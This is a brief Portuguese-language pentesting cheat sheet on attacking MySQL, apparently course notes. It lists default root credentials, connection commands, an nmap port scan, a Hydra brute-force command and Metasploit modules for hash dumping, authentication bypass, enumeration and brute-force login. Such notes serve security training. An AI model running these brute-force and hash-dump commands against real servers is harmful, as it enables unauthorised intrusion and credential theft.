Mysql | Solyd One | Ataque específicos
- Mysql | Solyd One | Ataque específicos
info
Informações essencias
- Porta: 3306
- Usuário Default: root
- Senha: não tem senha
- Formato da Url:
mysql://<username>:<password>@<hostname>:<port>/<database_name> - Ver versão do Mysql:
mysql -V
Comandos básicos de conexão
mysql -u <username>
#specified username
#no password
mysql -u <username> -p
#with password
mysql -u <username> -p <database_name>
#specified database
mysql -u <username> -h <hostname> -P <port> -p
#specified hostname
#specified port
mysql -u <username> -h <hostname> -P <port> -p -D <database_name>
#specified database (-D)
Hydra - Mysql
hydra -L usuarios-mysql.txt -P <(head -n 300 passwords.txt) -f -t 16 -v mysql://X.X.X.X
Nmap - Mysql
- Validar se no host específico tem algum serviço Mysql
nmap -p 3306 X.X.X.X
Metasploit
msf> use auxiliary/scanner/mysql/mysql_version #version detection
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump #auth bypass dump
msf> use auxiliary/scanner/mysql/mysql_hashdump #password hashes
msf> use auxiliary/admin/mysql/mysql_enum #user enumeration
msf> use auxiliary/scanner/mysql/mysql_schemadump #schema dumping
msf> use exploit/windows/mysql/mysql_start_up #command execution
Brute Forcing
use auxiliary/scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set rhosts X.X.X.X
msf auxiliary(scanner/mysql/mysql_login) > set user_file /path/to/user.txt
msf auxiliary(scanner/mysql/mysql_login) > set pass_file /path/to/pass.txt
msf auxiliary(scanner/mysql/mysql_login) > set stop_on_success true
msf auxiliary(scanner/mysql/mysql_login) > exploit